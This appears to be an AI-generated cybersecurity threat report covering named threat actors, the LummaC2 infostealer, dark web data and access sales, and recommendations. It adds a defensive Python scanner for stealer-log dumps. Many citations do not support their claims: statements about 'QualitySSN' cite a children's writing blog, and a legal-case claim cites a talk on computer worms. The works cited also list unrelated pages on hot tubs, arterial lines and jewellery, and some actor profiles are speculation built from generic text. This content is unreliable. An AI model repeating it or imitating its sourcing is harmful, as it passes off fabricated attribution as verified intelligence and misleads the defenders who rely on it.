“QualitySSN” is associated with cybercriminals who utilize stolen credentials, such as usernames and passwords, obtained through malware and social engineering [55]. These criminals leverage such data to access websites, banking accounts, and cryptocurrency wallets to execute fraudulent transactions and transfer money [55]. Services advertised by such actors, or by those claiming to recover funds from them, include tracking cheating partners, clearing criminal records, fixing bad credit scores, social media hacks, and funds recovery [55]. This highlights the multifaceted nature of cybercrime, which extends beyond direct financial theft to a range of illicit services that exploit compromised personal data, particularly Social Security Numbers (SSNs) [57]. The presence of SSNs on the dark web poses significant risks, enabling identity theft and fraud, and necessitates actions like credit freezes and IP PINs to mitigate damage [57].
ErrOr_HB
The query links “ErrOr_HB” to a “hacker” and a “defacement group.” However, the provided research snippets refer to a technical error related to the “harfbuzz” library in the context of Java OpenJDK builds and library compilation issues [58]. The error typically involves missing header files or incorrect paths during software compilation [58]. This indicates that “ErrOr_HB” is not a threat actor or hacking group but rather a technical term related to software development or compilation errors. This is a clear misattribution in the query.
MrRius
The query links “MrRius” to a “hacker” and a “hacker group.” However, the provided research snippets discuss the Computer Fraud and Abuse Act in the context of legal proceedings or refer to an attorney named R. Eric Hacker [60]. Another snippet discusses Chinese threat actors deploying backdoors like MarsSnake, but does not mention “MrRius” [62]. There is no information in the provided material that identifies “MrRius” as a cybercriminal or a hacking group. This appears to be a misattribution in the query.
gesss
“gesss” is referenced as a general “threat actor” or “hacker” [63]. Threat actors are individuals or groups who carry out cyberattacks, categorized by their skill set, resources, and motivation [63]. While some hackers are highly skilled and target large, protected companies, others may be less sophisticated [64]. The U.S. Cybersecurity and Infrastructure Security Agency (CISA), FBI, EPA, and DoE have warned about “unsophisticated cyber actors” targeting the U.S. energy sector, exploiting poor cyber hygiene and exposed assets using “basic and elementary intrusion techniques” [65]. These less sophisticated actors can still cause significant consequences, including defacement, configuration changes, operational disruptions, and even physical damage [65]. This suggests that “gesss” could represent such an unsophisticated actor capable of causing substantial harm due to prevalent vulnerabilities.
personX
“personX” is a general reference to a cybercriminal or threat actor. Cybercriminals are individuals or groups who use digital technology for illegal activities, often motivated by financial gain [63]. They employ tactics such as social engineering, phishing, and deploying malicious software like ransomware [42]. The FBI is the lead federal agency for investigating cyberattacks and intrusions in the U.S., working to unmask malicious actors and impose consequences [42]. The National Crime Agency (NCA) in the UK also focuses on cybercrime, highlighting the global nature of the threat and the importance of international collaboration [43]. Common cybercrimes include identity theft, ransomware attacks, spoofing, and phishing [42]. Ransomware, in particular, can cause significant financial, data, and service losses, sometimes leading to business closure [43]. Cybercriminals also leverage online marketplaces for selling compromised data and tools, enabling even those with basic capabilities to cause serious harm [43].
decider
The query links “decider” to a “threat actor” and “LummaC2 malware.” LummaC2 is a commodity malware that appeared for sale on Russian-language cybercriminal forums in 2022 [9]. Threat actors deploy LummaC2 to infiltrate victim networks and exfiltrate sensitive information, including personally identifiable information (PII), financial credentials, cryptocurrency wallets, browser extensions, and multi-factor authentication (MFA) details [9]. It is often distributed via spearphishing hyperlinks and attachments, or by tricking users into clicking fake CAPTCHAs [9]. LummaC2 malware is designed to bypass standard cybersecurity measures through obfuscation, often embedded within spoofed or fake popular software [9]. The market for LummaC2 logs has seen a significant increase, indicating its widespread use [9].
Separately, “Decider” is also the name of a tool developed by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) in partnership with the Homeland Security Systems Engineering and Development Institute (HSSEDI) [47]. This web application helps users map adversary behavior against the MITRE ATT&CK framework by guiding them through a series of questions [47]. The CISA Decider tool is designed to make ATT&CK mapping more accessible for network defenders, analysts, and researchers, helping them to accurately understand adversary activities and make informed decisions to enhance collective defense [47]. It is important to distinguish between “decider” as a threat actor or associated malware and “Decider” as a cybersecurity tool.
IV. Dark Web Activity and Sales
The dark web continues to serve as a critical enabler for cybercriminal activities, offering a clandestine marketplace for stolen data, access credentials, and malicious tools. This underground economy significantly lowers the barrier to entry for aspiring cybercriminals and amplifies the impact of successful breaches.
Dark web forums like DarkForums, XSS, LeakBase, Dread, and RAMP are central to this ecosystem [12]. These platforms facilitate the trading of stolen data, including usernames, passwords, credit card details, and even highly sensitive information like Social Security Numbers (SSNs) [12]. For instance, “Jack_back,” a threat actor active on Darkforums, has been observed leaking sensitive data related to nuclear manufacturing and defense [41]. The sale of compromised data, such as the 1.3 billion individuals’ data exposed in the National Public Data (NPD) breach in the USA, directly fuels identity theft and fraud [40]. When personal information like SSNs is found on the dark web, it necessitates immediate protective actions such as freezing credit, locking SSNs, and obtaining an Identity Protection Personal Identification Number (IP PIN) [57].
Beyond data, these forums also host sales of unauthorized access. This includes Remote Desktop Protocol (RDP) and Virtual Private Network (VPN) access, which provide direct entry points into corporate networks [46]. Such access sales are highly sought after by threat actors for initial compromise, lateral movement, and subsequent deployment of ransomware or other malware. The market for stolen logs, particularly those obtained by infostealers like LummaC2, has seen a significant increase, with over 21,000 market listings selling LummaC2 logs from April to June 2024 alone [9]. This surge underscores the accessibility of tools for data exfiltration and the profitability of selling compromised credentials.
The presence of groups like “QualitySSN” on these platforms highlights the broader range of illicit services available, including credit score manipulation and funds recovery scams, all predicated on the exploitation of stolen personal information [55]. The dark web’s role extends beyond direct sales; it also serves as a hub for discussions on hacking techniques, vulnerability exploitation, and the distribution of malware [12]. This dynamic environment means that organizations must actively monitor dark web activity to detect early signs of compromise and understand the evolving tactics of threat actors [12]. Proactive dark web monitoring, coupled with robust internal security measures, is essential for protecting sensitive data and mitigating the risks posed by this pervasive underground economy.
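As an added illustration of the dark web monitoring practice described above (example code, not from this report or from any cited vendor): a small Python scanner that parses a constructed stealer-log style dump in the url:username:password layout such listings are commonly sold in, flags entries whose login host or account domain belongs to an assumed watch list of organization domains, and retains only a SHA-256 fingerprint of each exposed secret rather than the plaintext. The dump contents, domains and accounts are all constructed for the example, and the line layout is an assumption about how these logs are typically formatted.

```python
"""Credential-exposure monitor for stealer-log style dumps (added example).

Parses url:username:password lines, matches them against an organization's
watched domains, and reports exposures without keeping plaintext secrets.
"""
import hashlib
import re
from dataclasses import dataclass

# Constructed sample dump: every host, account and password here is invented.
SAMPLE_DUMP = """\
https://portal.example-corp.test/login:j.doe@example-corp.test:Winter2024!
https://mail.other-company.test/:alice@other-company.test:hunter2
vpn.example-corp.test:EXAMPLE\\svc-backup:P@ssw0rd
https://shop.unrelated.test/account:bob@gmail.test:qwerty
malformed line without separators
"""

# Assumed watch list: domains the monitored organization owns.
WATCH_DOMAINS = {"example-corp.test"}

# Scheme, port and path are optional. The secret is everything after the
# "host:user:" prefix, so passwords containing ':' survive; usernames may not.
LINE_RE = re.compile(
    r"^(?:[a-z][a-z0-9+.-]*://)?(?P<host>[^/:\s]+)(?::\d+)?(?:/[^:\s]*)?"
    r":(?P<user>[^:\s]+):(?P<secret>.+)$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Record:
    host: str
    user: str
    secret: str


@dataclass(frozen=True)
class Alert:
    host: str
    user: str
    secret_fingerprint: str  # hash prefix only; the plaintext is never retained
    reasons: tuple


def parse_dump(text: str) -> list:
    """Parse dump lines into Records; malformed lines are dropped, not guessed at."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            records.append(Record(m["host"].lower(), m["user"], m["secret"]))
    return records


def in_scope(name: str, watch: set) -> bool:
    """True if name is a watched domain or a subdomain of one."""
    return any(name == d or name.endswith("." + d) for d in watch)


def fingerprint(secret: str) -> str:
    """Short SHA-256 prefix: enough to correlate the same secret across leaks."""
    return hashlib.sha256(secret.encode("utf-8")).hexdigest()[:12]


def scan_dump(text: str, watch: set) -> list:
    """Return one Alert per record whose login host or account domain is watched."""
    alerts = []
    for rec in parse_dump(text):
        reasons = []
        if in_scope(rec.host, watch):
            reasons.append("login-host")
        if "@" in rec.user and in_scope(rec.user.rsplit("@", 1)[1].lower(), watch):
            reasons.append("account-domain")
        if reasons:
            alerts.append(Alert(rec.host, rec.user, fingerprint(rec.secret), tuple(reasons)))
    return alerts


if __name__ == "__main__":
    for a in scan_dump(SAMPLE_DUMP, WATCH_DOMAINS):
        print(f"{a.user} on {a.host}: exposed ({', '.join(a.reasons)}), "
              f"secret sha256 {a.secret_fingerprint}")
```

Against the constructed dump the scanner raises two alerts: the portal login, which matches on both the host and the account domain, and the VPN entry, which matches on the host alone although its username is a domain account rather than an e-mail address. Keeping only a hash prefix lets an analyst tell whether a later listing re-sells the same secret without the monitoring system itself becoming a store of plaintext passwords; each alert would feed the forced reset and MFA review that the recommendations in Section V call for.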
V. Conclusions
The analysis of recent cybersecurity incidents underscores a pervasive and evolving threat landscape characterized by a significant interplay between politically motivated hacktivism, sophisticated state-sponsored operations, and financially driven cybercrime. The traditional categorization of threat actors is increasingly insufficient, as groups demonstrate fluid motivations and operational models. This convergence means that organizations must prepare for a wider spectrum of attacks, where geopolitical events can rapidly translate into direct cyber threats, and where criminal infrastructure is leveraged for state-aligned objectives.
Several incidents highlighted a concerning trend of misattribution or lack of specific supporting details within the provided research material. For incidents such as the Al-Dail Real Estate defacement, Art Line Life Srl defacement, Public Grievance Redressal System Maharashtra data breach, Indonesian Drone Pilot Association APDI data breach, Eternal Hospital data breach, Directorate of Constitutional Bodies Audit defacement, Republic of Cyprus data breach, South Africa corp admin access sale, and USA corp admin access sale, the provided URLs and snippets were largely unrelated to the specific incidents or the named threat actors. Furthermore, the query’s attribution of “ErrOr_HB” and “MrRius” to hacking entities was found to be a misinterpretation of technical terms or unrelated individuals. This emphasizes the critical need for accurate, verified intelligence in cybersecurity reporting to avoid misdirection and ensure effective defensive strategies.
Despite these data limitations for specific incidents, broader patterns are clear:
- Persistent Hacktivism: Groups like KAL EGY 319 and Keymous+ continue to engage in politically motivated defacements and data leaks, particularly impacting government and educational sectors in regions of geopolitical tension. While their technical impact might sometimes be overstated, their disruptive intent and ability to amplify narratives remain significant.
- State-Sponsored Sophistication: Entities like Team 1722 (Sandworm) demonstrate the advanced capabilities and global reach of state-backed actors. Their reliance on common vulnerabilities and the use of criminally sourced tools highlight a strategic approach to maintaining persistence and expanding their victimology footprint.
- Thriving Cybercrime Ecosystem: The widespread availability of commodity malware like LummaC2 and the robust dark web marketplaces for stolen data and access credentials continue to empower a diverse range of cybercriminals, from unsophisticated actors to more advanced groups. This accessible infrastructure ensures a persistent threat of data exfiltration, financial fraud, and ransomware attacks.
To effectively counter these multifaceted threats, organizations must adopt a comprehensive and adaptive cybersecurity posture. This includes:
- Enhanced Threat Intelligence: Moving beyond traditional threat actor categories to understand the fluid motivations and capabilities that blur the lines between hacktivism, cybercrime, and state-sponsored activity. This requires continuous monitoring of geopolitical developments and their potential cyber ramifications.
- Proactive Vulnerability Management: Regularly patching and updating all systems and applications to address known security flaws, as these are frequently exploited by both sophisticated and unsophisticated actors.
- Robust Access Controls and Authentication: Implementing strong access controls, multi-factor authentication (MFA), and regularly auditing database configurations to prevent unauthorized access and data leaks, especially given the prevalence of RDP/VPN access sales on the dark web.
- Dark Web Monitoring: Actively monitoring dark web forums and marketplaces for mentions of compromised organizational data, credentials, and access sales to enable rapid response and mitigation.
- Incident Response Preparedness: Developing and regularly testing comprehensive incident response plans to effectively detect, contain, and recover from breaches, recognizing that even seemingly minor incidents can have cascading effects.
The dynamic nature of the cyber threat landscape necessitates a continuous evolution of defensive strategies, prioritizing intelligence-driven approaches and fostering collaboration across sectors to build collective resilience.
Works cited
1. Brief Disruptions, Bold Claims: The Tactical Reality Behind the India-Pakistan Hacktivist Surge | CloudSEK, accessed May 24, 2025, https://www.cloudsek.com/blog/brief-disruptions-bold-claims-the-tactical-reality-behind-the-india-pakistan-hacktivist-surge
2. India-Pakistan cyber conflict: CloudSEK exposes the truth behind hacktivist hype – CRN, accessed May 24, 2025, https://www.crn.in/news/india-pakistan-cyber-conflict-cloudsek-exposes-the-truth-behind-hacktivist-hype/
3. India Experiences Surge in Hacktivist Group Activity Amid Military Tensions – Cyble, accessed May 24, 2025, https://cyble.com/blog/india-experience-hacktivist-group-activity/
4. Our Investigation of the CNSS Data Leak [Flash Report] – CybelAngel, accessed May 24, 2025, https://cybelangel.com/our-investigation-of-the-cnss-data-leak-flash-report/
5. Cybercriminals Attacked National Social Security Fund of Morocco – Millions of Digital Identities at Risk of Data Breach – Resecurity, accessed May 24, 2025, https://www.resecurity.com/blog/article/cybercriminals-attacked-national-social-security-fund-of-morocco-millions-of-digital-identities-at-risk-of-data-breach
6. Rise in hacktivist threats to critical sector, as pro-Russian groups cause 50% rise in ICS/OT attacks in March – Industrial Cyber, accessed May 24, 2025, https://industrialcyber.co/reports/rise-in-hacktivist-threats-to-critical-sector-as-pro-russian-groups-cause-50-rise-in-ics-ot-attacks-in-march/
7. Microsoft Uncovers Sandworm Subgroup’s Global Cyber Attacks Spanning 15+ Countries, accessed May 24, 2025, https://thehackernews.com/2025/02/microsoft-uncovers-sandworm-subgroups.html
8. Dark Web Profile: GhostSec – SOCRadar® Cyber Intelligence Inc., accessed May 24, 2025, https://socradar.io/dark-web-profile-ghostsec/
9. Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations – Internet Crime Complaint Center, accessed May 24, 2025, https://www.ic3.gov/CSA/2025/250521-2.pdf
10. Blacklock Ransomware: A Late Holiday Gift with Intrusion into the Threat Actor’s Infrastructure – Resecurity, accessed May 24, 2025, https://www.resecurity.com/blog/article/blacklock-ransomware-a-late-holiday-gift-with-intrusion-into-the-threat-actors-infrastructure
11. GhostLocker RaaS | SentinelOne, accessed May 24, 2025, https://www.sentinelone.com/anthology/ghostlocker-raas/
12. Top 10 Deep Web and Dark Web Forums – SOCRadar® Cyber Intelligence Inc., accessed May 24, 2025, https://socradar.io/top-10-deep-web-and-dark-web-forums/
13. Top 10 Dark Web Forums Of 2025 And Deep Web Communities – Cyble, accessed May 24, 2025, https://cyble.com/knowledge-hub/top-10-dark-web-forums/
14. The Week in Dark Web – 3 October 2022 – Data Leaks and Access Sales – SOCRadar, accessed May 24, 2025, https://socradar.io/the-week-in-dark-web-3-october-2022-data-leaks-and-access-sales/
15. Grievance Redressal Portal – GOVERNMENT OF MAHARASHTRA., accessed May 24, 2025, https://grievances.maharashtra.gov.in/en
16. Website Defacement Attacks | Group-IB Knowledge Hub, accessed May 24, 2025, https://www.group-ib.com/resources/knowledge-hub/website-defacement-attacks/
17. Texas House of Representatives, accessed May 24, 2025, https://house.texas.gov/index.php
18. CODE OF IOWA, accessed May 24, 2025, https://www.legis.iowa.gov/docs/publications/ICV/713266.pdf
19. Arterial line and Pressure Transducer – LITFL, accessed May 24, 2025, https://litfl.com/arterial-line-and-pressure-transducer/
20. Operator’s Manual – For use with Stellaris Elite™ BL14455 and BL15455 – Bausch + Lomb, accessed May 24, 2025, https://ifu.bausch.com/siteassets/pdf/4135904en_web.pdf
21. Ghost Squad Hackers – Wikipedia, accessed May 24, 2025, https://en.wikipedia.org/wiki/Ghost_Squad_Hackers
22. Kingsmen Creatives Ltd. – Ransomware.live Victim, accessed May 24, 2025, https://www.ransomware.live/id/S2luZ3NtZW4gQ3JlYXRpdmVzIEx0ZC5AZW1iYXJnbw==
23. IT Sec CyberSecurity | Kingsmen Security Group | Washington, DC, accessed May 24, 2025, https://www.kingsmenconsulting.net/
24. Welcome to The Institute of Cost Accountants of India Website, accessed May 24, 2025, https://icmai.in/
25. Cyber Threats and Financial Frauds in the Digital Age – ICMAI, accessed May 24, 2025, https://icmai.in/upload/BI/BFSI_21_03_2025.pdf
26. ZeroLogon Ransomware Exploits Windows AD to Hijack Domain Controller Access, accessed May 24, 2025, https://gbhackers.com/zerologon-ransomware-exploits-windows-ad/
27. SENATE – Congress.gov, accessed May 24, 2025, https://www.congress.gov/85/crecb/1958/01/16/GPO-CRECB-1958-pt1-7.pdf
28. 2022 Country Reports on Human Rights Practices: Turkey (Türkiye), accessed May 24, 2025, https://www.state.gov/reports/2022-country-reports-on-human-rights-practices/turkey/
29. Cyber lethality: Multidomain training enhances readiness at exercise African Lion 2025, accessed May 24, 2025, https://www.army.mil/article/285284/cyber_lethality_multidomain_training_enhances_readiness_at_exercise_african_lion_2025
30. “We are Anonymous”: Can Hacktivism Help in the Fight Against ISIS? | CGSRS, accessed May 24, 2025, https://cgsrs.org/publications/35
31. Anonymous (hacker group) – Wikipedia, accessed May 24, 2025, https://en.wikipedia.org/wiki/Anonymous_(hacker_group)
32. Breach notification in Tunisia – Data Protection Laws of the World, accessed May 24, 2025, https://www.dlapiperdataprotection.com/?t=breach-notification&c=TN
33. Proceeding of International Students Conference College of Hospitality Industry Management Suan Sunandha Rajabhat University April 27, 2022 – มหาวิทยาลัยราชภัฏสวนสุนันทา, accessed May 24, 2025, https://chm.ssru.ac.th/useruploads/files/20220426/a7f1b190c69f41436f30685341371f108a6dba2d.pdf
34. 5 killed as rains, flash floods hit Saudi coast – Kuwait Times, accessed May 24, 2025, https://kuwaittimes.com/uploads/imported_images/pdf/2015/nov/18/kt.pdf
35. Change Healthcare’s Mega Attack: 1 Year Later – Bank Info Security, accessed May 24, 2025, https://www.bankinfosecurity.com/change-healthcares-mega-attack-1-year-later-a-27578
36. US healthcare provider data breach impacts 1 million patients – Bleeping Computer, accessed May 24, 2025, https://www.bleepingcomputer.com/news/security/data-breach-at-us-healthcare-provider-chc-impacts-1-million-patients/
37. About Us – Driva’s Jewels, accessed May 24, 2025, https://drivasjewels.com/about
38. Cyberattack hits European Space Agency’s online store, payment …, accessed May 24, 2025, https://www.techmonitor.ai/technology/cybersecurity/cyberattack-esa-online-store-payment-card-data-stolen
39. European Space Agency domains hacked by Anonymous – Cyber Defense Magazine, accessed May 24, 2025, https://www.cyberdefensemagazine.com/european-space-agency-domains-hacked-by-anonymous/
40. 10 Biggest Data Breaches in the USA [2025] – Corbado, accessed May 24, 2025, https://www.corbado.com/blog/data-breaches-usa
41. Weekly Darkweb in May W2 – S2W, accessed May 24, 2025, https://s2w.inc/en/resource/detail/831
42. Cybercrime | Federal Bureau of Investigation – FBI, accessed May 24, 2025, https://www.fbi.gov/investigate/cyber
43. Cybercrime – National Crime Agency, accessed May 24, 2025, https://www.nationalcrimeagency.gov.uk/what-we-do/crime-threats/cyber-crime
44. CIPC | Your business, our focus, accessed May 24, 2025, https://www.cipc.co.za/
45. Register your business | U.S. Small Business Administration, accessed May 24, 2025, https://www.sba.gov/business-guide/launch-your-business/register-your-business
46. Sales of American and Brazilian Companies’ RDP Access, UK and India Government Site Databases – SOCRadar® Cyber Intelligence Inc., accessed May 24, 2025, https://socradar.io/sales-of-american-and-brazilian-companies-rdp-access-uk-and-india-government-site-databases/
47. CISA Decider tool helps to map adversary behavior against MITRE ATT&CK framework, accessed May 24, 2025, https://industrialcyber.co/cisa/cisa-decider-tool-helps-to-map-adversary-behavior-against-mitre-attck-framework/
48. Escalating Hacktivist Attacks Amidst India-Pakistan Tensions – Radware, accessed May 24, 2025, https://www.radware.com/security/threat-advisories-and-attack-reports/escalating-hacktivist-attacks-amidst-india-pakistan-tensions/
49. Career in Malware Development? : r/ExploitDev – Reddit, accessed May 24, 2025, https://www.reddit.com/r/ExploitDev/comments/17xh4m6/career_in_malware_development/
50. Morpheus 8 RF Machine – NYLO Aesthetics, accessed May 24, 2025, https://www.nyloaesthetics.com/products/morpheus-8-rf-machine/
51. Alexey Belov – Pibisi, accessed May 24, 2025, https://pibisi.com/en-eu/aml-lists/subjects/8b7fdf4b-4644-4c31-b861-7163c22299e3
52. 2021 – conference – IEMTRONICS 2025, accessed May 24, 2025, https://iemtronics.org/wp-content/uploads/2021/04/iemtronics-Conference-Proceedings-2021-v3.pdf
53. – POINTER – Web Posting Information – UW-Stevens Point, accessed May 24, 2025, https://epapers.uwsp.edu/pointers/1974/1974Dec05.pdf
54. 5380 – TAS xxx – Court of Arbitration for Sport, accessed May 24, 2025, https://jurisprudence.tas-cas.org/Shared%20Documents/5380.pdf
55. Writing Sentences Made Easy! – Read Like A Rock Star!, accessed May 24, 2025, http://readlikearockstar.blogspot.com/2020/04/writing-sentences-made-easy.html
56. Hot Tub Maintenance Schedule – pools, accessed May 24, 2025, https://www.diplomatpools.com/blog/comments.cfm?page=Hot_Tub_Maintenance_Schedule
57. What to do if your Social Security number is on the dark web – LifeLock, accessed May 24, 2025, https://lifelock.norton.com/learn/internet-security/social-security-number-on-dark-web
58. 286288 – java/openjdk11: use system harfbuzz, ccache, etc. – FreeBSD Bugzilla, accessed May 24, 2025, https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=286288
59. Unable to build library – Solus Forum, accessed May 24, 2025, https://discuss.getsol.us/d/9099-unable-to-build-library
60. Hacking History: The first computer worm – Håvard Opheim – NDC Security 2025 – YouTube, accessed May 24, 2025, https://www.youtube.com/watch?v=D52nDuLlJC0
61. Eric Hacker | Delaware Commercial Litigation – Morris James LLP, accessed May 24, 2025, https://www.morrisjames.com/bio/r-eric-hacker/
62. Chinese Hackers Deploy MarsSnake Backdoor in Multi-Year Attack on Saudi Organization, accessed May 24, 2025, https://thehackernews.com/2025/05/chinese-hackers-deploy-marssnake.html
63. What is a Threat Actor? Types & Examples – SentinelOne, accessed May 24, 2025, https://www.sentinelone.com/cybersecurity-101/threat-intelligence/threat-actor/
64. The Hacker – Profiling Cyber Criminals – SecurityRI.com, accessed May 24, 2025, https://www.securityri.com/the-hacker-profile/
65. Unsophisticated cyber actors are targeting the U.S. Energy sector – Security Affairs, accessed May 24, 2025, https://securityaffairs.com/177551/security/unsophisticated-cyber-actors-are-targeting-the-u-s-energy-sector.html
66. How dark web report works – Google Search Help, accessed May 24, 2025, https://support.google.com/websearch/answer/15191033?hl=en